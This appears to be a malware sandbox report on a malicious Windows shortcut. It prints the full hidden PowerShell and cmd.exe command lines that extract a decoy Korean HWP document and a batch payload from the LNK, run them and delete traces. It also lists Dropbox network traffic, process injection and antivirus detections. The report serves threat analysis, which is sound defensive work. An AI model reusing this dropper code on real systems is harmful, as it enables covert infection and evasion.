cmdline powershell.exe -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x032B004C} | Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000130A, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00011400;$lnkFile.Read($pdfFile, 0, 0x00011400);$PdfPath = $lnkPath.Replace('.lnk','.hwp');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0001270A,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'031023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;"
cmdline "C:\Windows\SysWOW64\cmd.exe" /k echo SET a=power>C:\Users\Public\032310.bat&&echo SET b=shell.exe>>C:\Users\Public\032310.bat&&echo SET M=%a%%b%>>C:\Users\Public\032310.bat&&echo call %M% -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x032B004C} | Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000130A, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00011400;$lnkFile.Read($pdfFile, 0, 0x00011400);$PdfPath = $lnkPath.Replace('.lnk','.hwp');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0001270A,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'031023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;">>C:\Users\Public\032310.bat&& start /min C:\Users\Public\032310.bat&&exit
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\rv5o9q0r.cmdline"
file C:\Users\test22\AppData\Local\Temp\RESBE3.tmp
file c:\Users\test22\AppData\Local\Temp\CSCBC2.tmp
Time & API Arguments Status Return Repeated

send

 buffer: |xe;‡WÆ;A7Èpìé¢zŠ™<ºh‹c—€Pcô˕[/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;‡;ÆXüj!_ sU@¯˜oPSyrÇájÆvjÀ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;’_–Çœe"ÔÍÞtƒ‚=˜rLNÞ~Þ9t⦀5/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;’Òv„Ø×@¡w¿/"6B-Œº¯Ãòq °„Ò/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;Wœhñðªý1«ÔÌö¢‚)aû=Ü°hUHrd²/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;áŒTÕµO€ ¹j[üΛ¿Á‘·´ýK‡ŒÚY1/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;¨Ln4±Ô,[”ƒ ”<e^Ix{nÔB>-Ò¾ƒá/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;¨ÀGÉ tŒ¼Í68¨ݞó4°°›oqp@i/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;³´ù‹¢u®–³&FÂù…9·ÌŒÖ}[Xòö/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;³ViŽ3Š‡†fÈQðô iyÕOeT 1-‚/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;¾f5N^| ½gÕ¿B¦Æ¡¬Ê­ÛÔnksÑ[WN/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;¾/ˆm ʤŠ0yToÿÞÁ4FZސ±Q¢$ /5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;ÉÒäÂ4ís¾Ç“ 1O¦ÂÔx؊$,/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;ÉÍlËs3 xÍ.›üqñ´4»ö™À7Ùkù¬”/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;ÔâÑÚ%¬_@±¢G”ÿ¨Ú±ëouS˜š‡qªj/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;Ô»ëú¹ÒK’¤ÿ°M²i➆àËU†¼§ò(P/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;ßŸŸfŽ;ƒÂ'Iþ¸X£—Dr©q]8Ÿ…sA)ù/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;ßš¡ì>¬Í€—áÍxûÕO8£M?¢ ³£=•j½É/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;ê§œZ¤ð T“‘Ë÷ \+Ê 6á|iˆs Þ]/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;êÞ·ç”È ©¾-˜Ý[%È·ïãŽN— E‡Å^/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;õ_o÷íÚ·%"í 4CƒKÆmˆÎéœ#<þF¨Î•/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0

send

 buffer: |xe;õÂhSì–3âç^Ýoª =¡Á Ší›µŽpBOÙ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
socket: 1292
sent: 129
1 129 0
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\vl9yckxz.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\se0jed8v.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\ynlhqo4l.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\rv5o9q0r.cmdline"
parent_process powershell.exe martian_process "C:\Users\Public\031023.bat"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\북한최고인민회의 결과.hwp
parent_process powershell.exe martian_process "C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\북한최고인민회의 결과.hwp"
Process injection Process 2552 resumed a thread in remote process 2684
Process injection Process 2684 resumed a thread in remote process 2780
Process injection Process 2992 resumed a thread in remote process 3044
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2684
1 0 0

NtResumeThread

 thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2780
1 0 0

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 3044
1 0 0
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
Lionic Trojan.WinLNK.Agent.4!c
DrWeb Trojan.MulDrop24.1340
FireEye Heur.BZC.YAX.Pantera.117.429620B2
CAT-QuickHeal Lnk.Trojan.A10352454
Skyhigh BehavesLike.Trojan.vx
VIPRE Heur.BZC.YAX.Pantera.117.429620B2
Arcabit Heur.BZC.YAX.Pantera.117.429620B2
Symantec CL.Downloader!gen119
ESET-NOD32 a variant of Generik.JDNURFO
Avast LNK:Agent-HS [Trj]
Kaspersky HEUR:Trojan.WinLNK.Agent.gen
BitDefender Heur.BZC.YAX.Pantera.117.429620B2
Emsisoft Heur.BZC.YAX.Pantera.117.429620B2 (B)
Zillya Trojan.Agent.Script.1741465
Sophos Troj/LnkDrop-M
SentinelOne Static AI - Suspicious LNK
MAX malware (ai score=84)
Microsoft TrojanDownloader:PowerShell/MoniSaint.C!dha
ViRobot LNK.S.Agent.53149772
ZoneAlarm HEUR:Trojan.WinLNK.Agent.gen
GData Heur.BZC.YAX.Pantera.117.429620B2
Google Detected
AhnLab-V3 Dropper/LNK.Generic.S2373
VBA32 Trojan.Link.Crafted
ALYac Trojan.Agent.LNK.Gen
Ikarus Trojan.SuspectCRC
AVG LNK:Agent-HS [Trj]
Panda JS/BondatN.gen
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe